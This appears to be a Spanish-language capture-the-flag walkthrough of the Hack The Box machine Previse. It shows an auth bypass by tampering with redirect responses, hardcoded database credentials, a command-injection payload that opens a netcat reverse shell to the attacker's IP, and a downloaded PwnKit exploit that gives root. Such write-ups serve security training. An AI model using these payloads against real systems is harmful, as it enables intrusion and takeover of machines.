Maquina Retirada Previse de Hack The Box (Necesario VIP)
Previse ~ Hack The Box
Realizamos el Primer escaneo con Nmap
$" nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn -oG allports 10.10.10.125 "
Procedemos con el siguiente escaneo de Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
#nmap 7.91 scan initiated Fri Oct 29 10:31:39 2021 as: nmap --script http-enum -p80 -oN WebScan 10.10.11.104
Nmap scan report for 10.10.11.104
Host is up (0.044s latency).
Lanzamos el Script http-enum
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /login.php: Possible admin folder
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_ /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
Lanzamos la herramienta Whatweb
# Nmap done at Fri Oct 29 10:31:48 2021 -- 1 IP address (1 host up) scanned in 9.17 seconds
http://10.10.11.104:80 [302 Found] Apache[2.4.29], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.11.104], Meta-Author[m4lwhere], RedirectLocation[login.php], Script, Title[Previse Home]
Fuzzeamos por posibles archivos a nivel http
Target: http://10.10.11.104/FUZZ.php
Total requests: 220548
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000187: 200 31 L 60 W 1248 Ch "nav"
000000320: 200 5 L 14 W 217 Ch "footer"
000000004: 302 0 L 0 W 0 Ch "download"
000000002: 302 71 L 164 W 2801 Ch "index"
000000081: 302 112 L 263 W 4914 Ch "files"
000000751: 302 74 L 176 W 2966 Ch "status"
000000040: 200 53 L 138 W 2224 Ch "login"
000001212: 302 0 L 0 W 0 Ch "logout"
000001376: 302 93 L 238 W 3994 Ch "accounts"
000001477: 200 0 L 0 W 0 Ch "config"
000002258: 302 0 L 0 W 0 Ch "logs"
000000178: 200 20 L 64 W 980 Ch "header"
000045227: 403 9 L 28 W 277 Ch "http://10.10.11.104/.php"
Vemos que encontramos un 302 para recursos a nivel web, procedemos a usar Burpsuite para modificar la respuesta del Servidor de 302 a 200 OK
Probamos con el recurso encontrado accounts.php
Cambiamos la cabecera 302 Not Found --> 200 OK desde Burpsuite
Inteceptando la respuesta del Servidor
Venmos que conseguimos entrar al recurso accounts.php
saltandonos el panel login.
Procemos a crear un usuario llamado admin:admin
POST /accounts.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/accounts.php
Cookie: PHPSESSID=p79kvpmandld75npavcn0cra88
Upgrade-Insecure-Requests: 1
username=admin&password=admin&confirm=admin&submit=
Procedemos a salirnos al login.php
inicial e intentar conectarnos como el usuario que hemos creado
Vemos que accedemos correctamente
Encontramos el siguiente Menu
HOME ACCOUNTS FILES MANAGEMENT MENU ADMIN
En FILES
encontramos un archivito –> SiteBackup.zip
–> Procedemos a descargarnoslo a nuestra maquina atacante
# 7z x siteBackup.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=es_ES.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i7-8700K CPU @ 3.70GHz (906EA),ASM,AES-NI)
Scanning the drive for archives:
1 file, 9948 bytes (10 KiB)
Extracting archive: siteBackup.zip
--
Path = siteBackup.zip
Type = zip
Physical Size = 9948
Everything is Ok
Files: 13
Size: 24047
Compressed: 9948
Vemos los diferentes recursos que encontramos a nivel del SiteBackup.zip
# tree
.
├── accounts.php
├── config.php
├── download.php
├── file_logs.php
├── files.php
├── footer.php
├── header.php
├── index.php
├── login.php
├── logout.php
├── logs.php
├── nav.php
├── siteBackup.zip
└── status.php
Encontramos Credenciales en Texto Claro
# cat config.php
<?php
function connectDB(){
$host = 'localhost';
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
$mycon = new mysqli($host, $user, $passwd, $db);
return $mycon;
}
?>
Procedemos a seguir inspeccionando la web y sus menus. Nos dirigimos al MANAGEMENT MENU
que tiene Dos SubMenus
WebSite Status – Log Data
Procedemos a interceptar con burpsuite una peticion del Submenu – Log Data
GET /file_logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.11.104/status.php
Connection: close
Cookie: PHPSESSID=p79kvpmandld75npavcn0cra88
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Vemos que se produce un GET a file_logs.php
pero tambien vemos que tenemos un Botton para ejecutar una accion comma
Vemos que la peticion interceptada con Burpsuite para el recurso via Post logs.php
POST /logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/file_logs.php
Cookie: PHPSESSID=p79kvpmandld75npavcn0cra88
Upgrade-Insecure-Requests: 1
delim=comma
Inspeccionemos el codigo fuente de este Recurso ya que vemos que en la respuesta parace que se estan ejecutando algun tipo de comando a nivel de sistema
# cat logs.php
<?php
session_start();
if (!isset($_SESSION['user'])) {
header('Location: login.php');
exit;
}
?>
<?php
if (!$_SERVER['REQUEST_METHOD'] == 'POST') {
header('Location: login.php');
exit;
}
/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////
$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;
$filepath = "/var/www/out.log";
$filename = "out.log";
if(file_exists($filepath)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($filepath));
ob_clean(); // Discard data in the output buffer
flush(); // Flush system headers
readfile($filepath);
die();
} else {
http_response_code(404);
die();
}
?>
Vemos el comentario del Desarrollador y analizamos el codigo en busca de posible Vulnerabilidad Command Injection
, dado que vemnos la variable $output = EXEC("Se Tenso")
Ahi tenemos un exec de un input que nosotros podemos modificar atraves del parametro Delim
Procedemos a hacer la siguiente Peticion por Post
POST /logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/file_logs.php
Cookie: PHPSESSID=p79kvpmandld75npavcn0cra88
Upgrade-Insecure-Requests: 1
"delim=comma+%26%26+nc+10.10.16.4+443+-e+/bin/bash "
Nos ponemos a la escucha con una session de nc
# nc -vlnp 443 1 ⚙
listening on [any] 443 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.104] 41780
# script /dev/null -c bash
Script started, file is /dev/null
# www-data@previse:/var/www/html$ ^Z
zsh: suspended nc -vlnp 443
# stty raw -echo;fg 148 ⨯ 2 ⚙
[1] - continued nc -vlnp 443
reset xterm
# www-data@previse:/var/www/html$ export TERM=xterm
# www-data@previse:/var/www/html$ export SHELL=bash
Enumeracion de la Maquina y Aplicacion de Una escalada De Privilegios No Convecional
www-data@previse:/tmp$ uname -a
Linux "previse 4.15.0-151-generic" #157-Ubuntu SMP Fri Jul 9 23:07:57 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Escalada Alternativa a Root //PwnKit//
Nos copiamos el siguiente Repositorio –> # git clone https://github.com/ly4k/PwnKit.git
Procdemos a montarnos un serividor con python3 para compartir el recurso PwnKit
a la maquina victima
www-data@previse:/tmp$ wget http://10.10.16.4/PwnKit
--2022-01-30 13:31:34-- http://10.10.16.4/PwnKit
Connecting to 10.10.16.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14688 (14K) [application/octet-stream]
Saving to: 'PwnKit'
PwnKit 100%[===================>] 14.34K --.-KB/s in 0.1s
2022-01-30 13:31:34 (125 KB/s) - 'PwnKit' saved [14688/14688]
Verificando que tenemos el archivo, procedemos a darle permisos para ejecutarlo
www-data@previse:/tmp$ ls
PwnKit test
www-data@previse:/tmp$ chmod +x PwnKit
Ejecutamos el exploit PwnKit
www-data@previse:/tmp$ ./PwnKit
root@previse:/tmp# whoami
root
Sacando la Flag para Root
root@previse:/tmp# cd /root
root@previse:~# ls
root.txt
root@previse:~# cat root.txt
xxxxxxxxdfadb7ab19dc709216xxxxxxxxx
root@previse:~#
Maquina Pwned Previse PwnKit OS Injection